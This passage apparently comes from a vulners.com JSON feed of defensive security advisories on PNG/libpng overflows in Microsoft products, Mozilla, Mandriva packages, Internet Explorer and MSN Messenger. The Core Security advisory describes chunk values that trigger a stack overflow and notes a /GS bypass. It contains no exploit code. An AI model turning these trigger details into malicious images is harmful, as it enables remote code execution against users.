There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\n \r\n\r\nSecurity Resources: \r\n\r\n\u2022 The Microsoft TechNet Security Web site provides additional information about security in Microsoft products.\r\n \r\n\u2022 Microsoft Software Update Services\r\n \r\n\u2022 Microsoft Baseline Security Analyzer (MBSA)\r\n \r\n\u2022 Windows Update\r\n \r\n\u2022 Windows Update Catalog: For more information about the Windows Update Catalog, see Microsoft Knowledge Base Article 323166.\r\n \r\n\u2022 Office Update \r\n \r\n\r\nSoftware Update Services:\r\n\r\nBy using Microsoft Software Update Services (SUS), administrators can quickly and reliably deploy the latest critical updates and security updates to Windows 2000 and Windows Server 2003-based servers, and to desktop systems that are running Windows 2000 Professional or Windows XP Professional.\r\n\r\nFor more information about how to deploy this security update with Software Update Services, visit the Software Update Services Web site.\r\n\r\nSystems Management Server:\r\n\r\nMicrosoft Systems Management Server (SMS) delivers a highly-configurable enterprise solution for managing updates. By using SMS, administrators can identify Windows-based systems that require security updates and perform controlled deployment of these updates throughout the enterprise with minimal disruption to end users. For more information about how administrators can use SMS 2003 to deploy security updates, visit the SMS 2003 Security Patch Management Web site. SMS 2.0 users can also use Software Updates Service Feature Pack to help deploy security updates. 
For information about SMS, visit the SMS Web site.\r\n\r\nNote SMS uses the Microsoft Baseline Security Analyzer, Microsoft Office Detection Tool and an Enterprise Update Scanning Tool to provide broad support for security bulletin update detection and deployment. Some software updates may not be detected by these tools. Administrators can use the inventory capabilities of the SMS in these cases to target updates to specific systems. For more information about this procedure, visit the following Web site. Some security updates require administrative rights following a restart of the system. Administrators can use the Elevated Rights Deployment Tool (available in the SMS 2003 Administration Feature Pack and in the SMS 2.0 Administration Feature Pack) to install these updates.\r\n\r\nDisclaimer: \r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. 
Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions: \r\n\r\n\u2022 V1.0 (February 8, 2005): Bulletin published\r\n \r\n", "edition": 1, "modified": "2005-02-08T00:00:00", "published": "2005-02-08T00:00:00", "id": "SECURITYVULNS:DOC:7769", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:7769", "title": "Microsoft Security Bulletin MS05-009 Vulnerability in PNG Processing Could Allow Remote Code Execution (890261)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:10", "bulletinFamily": "software", "cvelist": ["CVE-2004-0758", "CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598", "CVE-2004-0763"], "description": "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\nGentoo Linux Security Advisory GLSA 200408-22\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n http://security.gentoo.org/\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n Severity: Normal\r\n Title: Mozilla, Firefox, Thunderbird: New releases fix\r\n vulnerabilities\r\n Date: August 23, 2004\r\n Bugs: #57380, #59419\r\n ID: 200408-22\r\n\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\nSynopsis\r\n========\r\n\r\nNew releases of Mozilla, Mozilla Thunderbird, and Mozilla Firefox fix\r\nseveral vulnerabilities, including remote DoS and buffer overflows.\r\n\r\nBackground\r\n==========\r\n\r\nMozilla is a popular web browser that includes a mail and newsreader.\r\nMozilla Firefox is the next-generation browser from the Mozilla project\r\nthat incorporates advanced features that are yet to be incorporated\r\ninto Mozilla. 
Mozilla Thunderbird is the next-generation mail client\r\nfrom the Mozilla project.\r\n\r\nAffected packages\r\n=================\r\n\r\n -------------------------------------------------------------------\r\n Package / Vulnerable / Unaffected\r\n -------------------------------------------------------------------\r\n 1 mozilla < 1.7.2 >= 1.7.2\r\n 2 mozilla-firefox < 0.9.3 >= 0.9.3\r\n 3 mozilla-thunderbird < 0.7.3 >= 0.7.3\r\n 4 mozilla-bin < 1.7.2 >= 1.7.2\r\n 5 mozilla-firefox-bin < 0.9.3 >= 0.9.3\r\n 6 mozilla-thunderbird-bin < 0.7.3 >= 0.7.3\r\n -------------------------------------------------------------------\r\n 6 affected packages on all of their supported architectures.\r\n -------------------------------------------------------------------\r\n\r\nDescription\r\n===========\r\n\r\nSeveral vulnerabilities were found in Mozilla and Mozilla Firefox:\r\n\r\n* Both browsers contain a bug in their caching which may allow the\r\n SSL icon to remain visible, even when the site in question is an\r\n insecure site.\r\n\r\n* An attacker may force the browser to execute arbitrary code from a\r\n malicious website by utilizing Mozilla's predictable cache file\r\n locations, and its ability to execute local files within the local\r\n zone.\r\n\r\nMozilla, Mozilla Firefox and Mozilla Thunderbird contain the following\r\nvulnerabilities:\r\n\r\n* All Mozilla tools use libpng for graphics. This library contains a\r\n buffer overflow which may lead to arbitrary code execution.\r\n\r\n* If a user imports a forged Certificate Authority (CA) certificate,\r\n it may overwrite and corrupt the valid CA already installed on the\r\n machine.\r\n\r\nImpact\r\n======\r\n\r\nUsers of Mozilla and Mozilla Firefox are susceptible to SSL certificate\r\nspoofing, a Denial of Service against legitimate SSL sites, crashes,\r\nand arbitrary code execution. 
Users of Mozilla Thunderbird are\r\nsusceptible to crashes and arbitrary code execution via malicious\r\ne-mails.\r\n\r\nWorkaround\r\n==========\r\n\r\nThere is no known workaround for most of these vulnerabilities. All\r\nusers are advised to upgrade to the latest available version.\r\n\r\nResolution\r\n==========\r\n\r\nAll users should upgrade to the latest stable version:\r\n\r\n # emerge sync\r\n\r\n # emerge -pv your-version\r\n # emerge your-version\r\n\r\nReferences\r\n==========\r\n\r\n [ 1 ] CAN-2004-0763\r\n http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0763\r\n [ 2 ] CAN-2004-0758\r\n http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0758\r\n [ 3 ] CAN-2004-0597\r\n http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597\r\n [ 4 ] CAN-2004-0598\r\n http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0598\r\n [ 5 ] CAN-2004-0599\r\n http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0599\r\n\r\nAvailability\r\n============\r\n\r\nThis GLSA and any updates to it are available for viewing at\r\nthe Gentoo Security Website:\r\n\r\n http://security.gentoo.org/glsa/glsa-200408-22.xml\r\n\r\nConcerns?\r\n=========\r\n\r\nSecurity is a primary focus of Gentoo Linux and ensuring the\r\nconfidentiality and security of our users machines is of utmost\r\nimportance to us. 
Any security concerns should be addressed to\r\nsecurity@gentoo.org or alternatively, you may file a bug at\r\nhttp://bugs.gentoo.org.\r\n\r\nLicense\r\n=======\r\n\r\nCopyright 2004 Gentoo Foundation, Inc; referenced text\r\nbelongs to its owner(s).\r\n\r\nThe contents of this document are licensed under the\r\nCreative Commons - Attribution / Share Alike license.\r\n\r\nhttp://creativecommons.org/licenses/by-sa/1.0", "edition": 1, "modified": "2004-08-25T00:00:00", "published": "2004-08-25T00:00:00", "id": "SECURITYVULNS:DOC:6651", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6651", "title": "[ GLSA 200408-22 ] Mozilla, Firefox, Thunderbird: New releases fix vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:20", "bulletinFamily": "software", "cvelist": ["CVE-2006-3334", "CVE-2002-1363", "CVE-2004-0421", "CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n \r\n Mandriva Linux Security Advisory MDKSA-2006:213\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n \r\n Package : chromium\r\n Date : November 16, 2006\r\n Affected: 2007.0, Corporate 3.0\r\n _______________________________________________________________________\r\n \r\n Problem Description:\r\n \r\n Chromium is an OpenGL-based shoot them up game with fine graphics. 
It\r\n is built with a private copy of libpng, and as such could be\r\n susceptible to some of the same vulnerabilities:\r\n\r\n Buffer overflow in the png_decompress_chunk function in pngrutil.c in\r\n libpng before 1.2.12 allows context-dependent attackers to cause a\r\n denial of service and possibly execute arbitrary code via unspecified\r\n vectors related to "chunk error processing," possibly involving the\r\n "chunk_name". (CVE-2006-3334)\r\n\r\n It is questionable whether this issue is actually exploitable, but the\r\n patch to correct the issue has been included in versions < 1.2.12.\r\n\r\n In addition, an patch to address several old vulnerabilities has been\r\n applied to this build. (CAN-2002-1363, CAN-2004-0421, CAN-2004-0597,\r\n CAN-2004-0598, CAN-2004-0599)\r\n\r\n Packages have been patched to correct these issues.\r\n _______________________________________________________________________\r\n\r\n References:\r\n \r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1363\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0421\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0598\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0599\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3334\r\n _______________________________________________________________________\r\n \r\n Updated Packages:\r\n \r\n Mandriva Linux 2007.0:\r\n 7d7fd24f8be5c881673c11ed7fdda1d0 2007.0/i586/chromium-0.9.12-25.1mdv2007.0.i586.rpm\r\n 6175ab1df71466a69049dbda899c7c4b 2007.0/i586/chromium-setup-0.9.12-25.1mdv2007.0.i586.rpm \r\n 4dda1bbb70cce5cb6f1112995992ee1e 2007.0/SRPMS/chromium-0.9.12-25.1mdv2007.0.src.rpm\r\n\r\n Mandriva Linux 2007.0/X86_64:\r\n c2b87550ef24da183d0fe78e850080b5 2007.0/x86_64/chromium-0.9.12-25.1mdv2007.0.x86_64.rpm\r\n 91e024a81f7ff04e49f429259feaf4cd 2007.0/x86_64/chromium-setup-0.9.12-25.1mdv2007.0.x86_64.rpm \r\n 
4dda1bbb70cce5cb6f1112995992ee1e 2007.0/SRPMS/chromium-0.9.12-25.1mdv2007.0.src.rpm\r\n\r\n Corporate 3.0:\r\n 69ca9e0a4887c915bc283164b763b054 corporate/3.0/i586/chromium-0.9.12-21.1.C30mdk.i586.rpm\r\n 4ca444ca9edb34229f0d1449f2e4d82f corporate/3.0/i586/chromium-setup-0.9.12-21.1.C30mdk.i586.rpm \r\n 5007614bdfc283a0f5bb854955606ed1 corporate/3.0/SRPMS/chromium-0.9.12-21.1.C30mdk.src.rpm\r\n\r\n Corporate 3.0/X86_64:\r\n 96a4f2c6ba97c16d04f816656a88d674 corporate/3.0/x86_64/chromium-0.9.12-21.1.C30mdk.x86_64.rpm\r\n 5b229452f499143e5d1dd73420d120aa corporate/3.0/x86_64/chromium-setup-0.9.12-21.1.C30mdk.x86_64.rpm \r\n 5007614bdfc283a0f5bb854955606ed1 corporate/3.0/SRPMS/chromium-0.9.12-21.1.C30mdk.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. 
You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.2.2 (GNU/Linux)\r\n\r\niD8DBQFFXMdZmqjQ0CJFipgRAn+MAKDbprCYkWVqDHH1ivaZLylt1jjxKwCeMhhY\r\n92WG8JUMC6mrEwxfMCrOhEc=\r\n=odb2\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2006-11-18T00:00:00", "published": "2006-11-18T00:00:00", "id": "SECURITYVULNS:DOC:15127", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:15127", "title": "[ MDKSA-2006:213 ] - Updated chromium packages to fix embedded libpng vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:20", "bulletinFamily": "software", "cvelist": ["CVE-2006-5793", "CVE-2006-3334", "CVE-2002-1363", "CVE-2004-0421", "CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n \r\n Mandriva Linux Security Advisory MDKSA-2006:212\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n \r\n Package : doxygen\r\n Date : November 16, 2006\r\n Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0\r\n _______________________________________________________________________\r\n \r\n Problem Description:\r\n \r\n Doxygen is a documentation system for C, C++ and IDL. 
It is built with\r\n a private copy of libpng, and as such could be susceptible to some of\r\n the same vulnerabilities:\r\n\r\n Buffer overflow in the png_decompress_chunk function in pngrutil.c in\r\n libpng before 1.2.12 allows context-dependent attackers to cause a\r\n denial of service and possibly execute arbitrary code via unspecified\r\n vectors related to "chunk error processing," possibly involving the\r\n "chunk_name". (CVE-2006-3334)\r\n\r\n It is questionable whether this issue is actually exploitable, but the\r\n patch to correct the issue has been included in versions < 1.2.12.\r\n\r\n Tavis Ormandy, of the Gentoo Linux Security Auditing Team, discovered a\r\n typo in png_set_sPLT() that may cause an application using libpng to\r\n read out of bounds, resulting in a crash. (CVE-2006-5793)\r\n\r\n In addition, an patch to address several old vulnerabilities has been\r\n applied to this build. (CAN-2002-1363, CAN-2004-0421, CAN-2004-0597,\r\n CAN-2004-0598, CAN-2004-0599)\r\n\r\n Packages have been patched to correct these issues.\r\n _______________________________________________________________________\r\n\r\n References:\r\n \r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1363\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0421\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0598\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0599\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3334\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5793\r\n _______________________________________________________________________\r\n \r\n Updated Packages:\r\n \r\n Mandriva Linux 2006.0:\r\n f85fd4b73ca06136e4346df073851e5f 2006.0/i586/doxygen-1.4.4-1.1.20060mdk.i586.rpm \r\n 0842c1496bbb02b79d5cef3386b19380 2006.0/SRPMS/doxygen-1.4.4-1.1.20060mdk.src.rpm\r\n\r\n Mandriva Linux 2006.0/X86_64:\r\n fc3e569bd8ad2aa9aea76a6f4246cfec 
2006.0/x86_64/doxygen-1.4.4-1.1.20060mdk.x86_64.rpm \r\n 0842c1496bbb02b79d5cef3386b19380 2006.0/SRPMS/doxygen-1.4.4-1.1.20060mdk.src.rpm\r\n\r\n Mandriva Linux 2007.0:\r\n 9d0af28627560057e6c80e64bbacf030 2007.0/i586/doxygen-1.4.7-1.1mdv2007.0.i586.rpm \r\n f673aab0185f79a8aa048f69b06807bf 2007.0/SRPMS/doxygen-1.4.7-1.1mdv2007.0.src.rpm\r\n\r\n Mandriva Linux 2007.0/X86_64:\r\n 7fca6ebbe6f07e51de7fd771678277b4 2007.0/x86_64/doxygen-1.4.7-1.1mdv2007.0.x86_64.rpm \r\n f673aab0185f79a8aa048f69b06807bf 2007.0/SRPMS/doxygen-1.4.7-1.1mdv2007.0.src.rpm\r\n\r\n Corporate 3.0:\r\n 9452cede2d92671808eebe1adfc395ef corporate/3.0/i586/doxygen-1.3.5-2.1.C30mdk.i586.rpm \r\n 9e84b6e12b77f43d123888b7ae05e5f4 corporate/3.0/SRPMS/doxygen-1.3.5-2.1.C30mdk.src.rpm\r\n\r\n Corporate 3.0/X86_64:\r\n d988dc94c39515b3855116709bcc84de corporate/3.0/x86_64/doxygen-1.3.5-2.1.C30mdk.x86_64.rpm \r\n 9e84b6e12b77f43d123888b7ae05e5f4 corporate/3.0/SRPMS/doxygen-1.3.5-2.1.C30mdk.src.rpm\r\n\r\n Corporate 4.0:\r\n a3b4702c81d1739249d59782efb316dc corporate/4.0/i586/doxygen-1.4.4-1.1.20060mlcs4.i586.rpm \r\n 8223a356c6cf8a790dd20b3d70533f19 corporate/4.0/SRPMS/doxygen-1.4.4-1.1.20060mlcs4.src.rpm\r\n\r\n Corporate 4.0/X86_64:\r\n 0568b10460c651f18fd3e2a8e76b4300 corporate/4.0/x86_64/doxygen-1.4.4-1.1.20060mlcs4.x86_64.rpm \r\n 8223a356c6cf8a790dd20b3d70533f19 corporate/4.0/SRPMS/doxygen-1.4.4-1.1.20060mlcs4.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. 
You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.2.2 (GNU/Linux)\r\n\r\niD8DBQFFXMIpmqjQ0CJFipgRAnt1AJ9NuzEsIC9PzHE278eZAhOPHjMh8QCePD/Q\r\npK8OJ2vhx3DqZ400EPH5QMw=\r\n=R8Jo\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2006-11-18T00:00:00", "published": "2006-11-18T00:00:00", "id": "SECURITYVULNS:DOC:15126", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:15126", "title": "[ MDKSA-2006:212 ] - Updated doxygen packages to fix embedded libpng vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:13", "bulletinFamily": "software", "cvelist": ["CVE-2004-0597"], "description": "Internet Security Systems Protection Advisory\r\nJune 14, 2005\r\n\r\nInternet Explorer PNG Overflow\r\n\r\nSummary:\r\n\r\nISS has shipped protection for a flaw X-Force has discovered in the PNG \r\nimage processing library used in software such as Microsoft's Internet \r\nExplorer web browser. By crafting a PNG file in a malicious manner, an \r\nattacker is able to trigger a heap overflow within Internet Explorer, \r\nleading to arbitrary code execution and remote compromise.\r\n\r\nISS Protection Strategy:\r\n\r\nISS has provided preemptive protection for these vulnerabilities. We \r\nrecommend that all customers apply applicable ISS product updates. 
\r\n\r\nNetwork Sensor 7.0, Proventia A and G100, G200, G1200:\r\nXPU 22.30 / 8/25/04\r\nImage_PNG_tRNS_BO\r\n\r\nProventia M and G400, G2000:\r\nXPU 1.28 / 8/25/04\r\nImage_PNG_tRNS_BO\r\n\r\nServer Sensor 7.0:\r\nXPU 22.30 / 8/25/04\r\nImage_PNG_tRNS_BO\r\n\r\nProventia Desktop\r\nXPU 8.0.614.1\r\nImage_PNG_tRNS_BO\r\n\r\nDesktop Protector 7.0:\r\nVersion ENR / 9/25/04\r\nImage_PNG_tRNS_BO\r\n\r\nBlackICE Agent for Server 3.6:\r\nVersion ENR / 9/25/04\r\nImage_PNG_tRNS_BO\r\n\r\n\r\nThese updates are now available from the ISS Download Center at:\r\nhttp://www.iss.net/download.\r\n\r\nBusiness Impact:\r\n\r\nCompromise of networks and machines using affected versions of Internet \r\nExplorer may lead to exposure of confidential information, loss of \r\nproductivity, and further network compromise. An attacker would be required \r\nto cause a user to view a malicious website or email containing a \r\nmaliciously crafted image. Successful exploitation would grant an attacker \r\nthe privileges of the user viewing the image, up to and including \r\nadministrative privileges. \r\n\r\nAffected Products:\r\n\r\nWindows 2000 up to and including SP4\r\nWindows XP up to and including SP2\r\nWindows Server 2003 up to and including SP1\r\n\r\nNote: Additional versions may be affected, please contact your \r\nvendor for confirmation.\r\n\r\nDescription:\r\n\r\nPortable Network Graphics (PNG) is a common and established image standard. \r\nThis image format is widely supported in applications that view images. \r\nMicrosoft's PNG filter library is a multi-purpose implementation of PNG \r\nrendering, and is used by applications such as Internet Explorer.\r\n\r\nMicrosoft's PNG filter library contains a buffer overflow vulnerability \r\nwhen processing maliciously-crafted PNG images. The library does not \r\ncorrectly handle a specific large PNG chunk, leading to heap corruption. 
\r\nExploitation of this buffer overflow can lead to remote compromise of \r\naffected machines with minimal user-interaction.\r\n\r\nWhile this library is used by Internet Explorer, it is likely that additional \r\napplications make use of this library and may be affected as well. In order \r\nto exploit this vulnerability through Internet Explorer, an attacker would be \r\nrequired to induce the victim to view a web page or email message containing \r\na maliciously-crafted PNG image.\r\n\r\nThe ISS X-Press Updates detailed above have the ability to protect \r\nagainst attack attempts targeted at Internet Explorer.\r\n\r\nAdditional Information:\r\n\r\nMicrosoft Security Bulletin:\r\nhttp://www.microsoft.com/technet/security/Bulletin/MS05-025.mspx\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the \r\nname CAN-2004-0597 to this issue. This is a candidate for inclusion in \r\nthe CVE list (http://cve.mitre.org), which standardizes names for \r\nsecurity problems.\r\n\r\nCredit:\r\n\r\nThis vulnerability was discovered and researched by Mark Dowd of the ISS \r\nX-Force.\r\n\r\n______\r\n\r\nAbout Internet Security Systems (ISS)\r\nInternet Security Systems, Inc. (ISS) is the trusted security expert to\r\nglobal enterprises and world governments, providing products and services\r\nthat protect against Internet threats. An established world leader\r\nin security since 1994, ISS delivers proven cost efficiencies and\r\nreduces regulatory and business risk across the enterprise for\r\nmore than 11,000 customers worldwide. ISS products and services\r\nare based on the proactive security intelligence conducted by ISS'\r\nX-Force┬\u043e research and development team \u0442\u0410\u0423 the unequivocal world\r\nauthority in vulnerability and threat research. 
Headquartered\r\nin Atlanta, Internet Security Systems has additional operations\r\nthroughout the Americas, Asia, Australia, Europe and the Middle East.\r\n\r\nCopyright (c) 2005 Internet Security Systems, Inc. All rights reserved\r\nworldwide.\r\n\r\nThis document is not to be edited or altered in any way without the\r\nexpress written consent of Internet Security Systems, Inc. If you wish\r\nto reprint the whole or any part of this document, please email\r\n\r\nxforce@iss.net for permission. You may provide links to this document\r\nfrom your web site, and you may make copies of this document in\r\naccordance with the fair use doctrine of the U.S. copyright laws. \r\n\r\nDisclaimer: The information within this document may change without notice.\r\nUse of this information constitutes acceptance for use in an AS IS\r\ncondition. There are NO warranties, implied or otherwise, with regard to\r\nthis information or its use. Any use of this information is at the\r\nuser's risk. In no event shall the author/distributor (Internet Security\r\nSystems X-Force) be held liable for any damages whatsoever arising out\r\nof or in connection with the use or spread of this information.\r\n\r\nX-Force PGP Key available on MIT's PGP key server and PGP.com's key\r\nserver, as well as at http://www.iss.net/security_center/sensitive.php\r\nPlease send suggestions, updates, and comments to: X-Force\r\n\r\nxforce@iss.net of Internet Security Systems, Inc.", "edition": 1, "modified": "2005-06-15T00:00:00", "published": "2005-06-15T00:00:00", "id": "SECURITYVULNS:DOC:8854", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:8854", "title": "Internet Explorer PNG Overflow", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:11", "bulletinFamily": "software", "cvelist": ["CVE-2004-1244", "CVE-2004-0597"], "description": "\r\n Core Security Technologies Advisory\r\n 
http://www.coresecurity.com\r\n\r\n MSN Messenger PNG Image Parsing Vulnerability\r\n\r\n\r\n\r\nDate Published: 2005-02-08\r\n\r\nLast Update: 2005-02-08\r\n\r\nAdvisory ID: CORE-2004-0819\r\n\r\nBugtraq ID: None currently assigned.\r\n\r\nCVE Name: CAN-2004-0597\r\n\r\nTitle: MSN Messenger PNG Image Parsing Vulnerability\r\n\r\nClass: Boundary Error Condition (Stack Buffer Overflow)\r\n\r\nRemotely Exploitable: Yes\r\n\r\nLocally Exploitable: Yes\r\n\r\nAdvisory URL:\r\n http://www.coresecurity.com/common/showdoc.php?idx=421&idxseccion=10\r\n\r\nVendors contacted:\r\n- Microsoft\r\n 2004-08-23: Notification to vendor\r\n 2004-08-23: Notification acknowledgment received from vendor\r\n 2005-02-08: Publication of fixes and advisories\r\n\r\nRelease Mode: COORDINATED RELEASE\r\n\r\n\r\n*Vulnerability Description:*\r\n\r\n MSN Messenger is a fully featured Instant Messaging (IM) program,\r\n that allows users to exchange pictures using the PNG image format and\r\n display them during conversations.\r\n\r\n A vulnerability found in the parsing of PNG images could allow an\r\n attacker to execute arbitrary code in the chat partner's machine and\r\n gain access to the system with the privileges of the user running the\r\n MSN Messenger client program.\r\n\r\n This vulnerability can be exploited on Windows 2000 (all service\r\n packs) and Windows XP (all service packs) that run vulnerable\r\n clients of MSN Messenger.\r\n\r\n Due to the particular characteristics of the MSN Messenger\r\n communications protocol, exploitation of the vulnerability is likely\r\n to pass unnoticed to network Intrusion Detection Systems (IDS),\r\n Intrusion Prevention Systems (IPS) and firewalls that do not\r\n implement decoding and normalization of the MSN Messenger protocol\r\n encapsulated within HTTP. 
Furthermore, it is possible to craft\r\n exploit code to compromise vulnerable systems without crashing or\r\n disrupting the normal functioning of the MSN Messenger client\r\n application and thus passing unnoticed to the end-user as well.
Filter transmission of malformed PNG images using an\r\n application-layer proxy that supports MSN Messenger protocol.\r\n\r\n Disabling the "Display Picture" feature in MSN Messenger DOES NOT\r\n prevent exploitation.\r\n\r\n Core Security Technologies has made available a sample malformed\r\n PNG file that can be used to check if an MSN Messenger client is\r\n vulnerable.\r\n\r\n The ZIP-compressed image is available at\r\n\r\n http://www.coresecurity.com/corelabs/advisories/msn-vulncheck.zip\r\n\r\n After downloading it, uncompress and save it to a work folder, open\r\n MSN Messenger and select the image as your display picture in\r\n "Tools->Change Display Picture".\r\n\r\n Vulnerable clients will either crash or display popup dialog with the\r\n following text: "Your MSN Messenger client is vulnerable"\r\n\r\n\r\n*Credits:*\r\n\r\n This vulnerability was found by Juliano Rizzo from Core Security\r\n Technologies.\r\n\r\n Chris Evans discovered previous problems related to PNG images in\r\n the libPNG open source library [1][2].\r\n\r\n\r\n*Technical Description - Exploit/Concept Code:*\r\n\r\n This vulnerability was found in MSN Messenger 6.2.0137, all technical\r\n details apply to that package and version but may be applicable to\r\n other vulnerable versions as well.\r\n\r\n The MSN Messenger protocol supports transmission of several types of\r\n images between users that are displayed during conversations.\r\n These include:\r\n\r\n . The display picture, which usually is a picture of the user.\r\n . Custom icons that are small images shown in the message line.\r\n . Thumbnails of images being transferred.\r\n . Background images.\r\n\r\n The image format used is PNG [3]. When a user selects a picture to be\r\n displayed as avatar, Messenger converts it to PNG format with a fixed\r\n size and encoding characteristics. 
When a conversation is initiated\r\n with a contact, the image is transmitted over the same communication\r\n channel used to exchange text messages.\r\n By sending a specially crafted PNG image an attacker can trigger a\r\n buffer overflow and execute arbitrary code on the chat partner's\r\n system.\r\n\r\n The PNG file format structure is based on chunks as described in [3].\r\n The vulnerability is present in processing intentionally malformed\r\n image chunks with specially crafted values for some fields in the\r\n IHDR and tRNS chunk types.\r\n The IHDR chunk has a "color type" field: a single-byte integer that\r\n describes the interpretation of the image data. To trigger the bug,\r\n the flags "color used" and "palette used" have to be set in the color\r\n type field, whereas the "alpha channel used" flag must not be set.\r\n Thus, the color type value has to be set to 0x03. There must also\r\n exist a tRNS chunk with enough data length (>256) to overflow a\r\n buffer and reach a function pointer address. A PLTE chunk could exist\r\n in the file, but it has to be after the tRNS chunk.\r\n\r\n[MSN Messenger clients compiled with the /GS stack-overflow protection\r\nmechanism]\r\n\r\n Although the MSN Messenger client is compiled with the /GS compiler\r\n switch that provides protection against stack-based overflows as\r\n described in [4], exploitation is not prevented in this case.\r\n\r\n The following excerpt from MSDN describes the functionality of the\r\n /GS switch:\r\n\r\n "...The /GS switch provides a "speed bump" or cookie, between the\r\n buffer and the return address. If an overflow writes over the return\r\n address, it will have to overwrite the cookie put in between it and\r\n the buffer, resulting in a new stack layout..."\r\n\r\n The protection mechanism verifies the integrity of a called\r\n function's return address. 
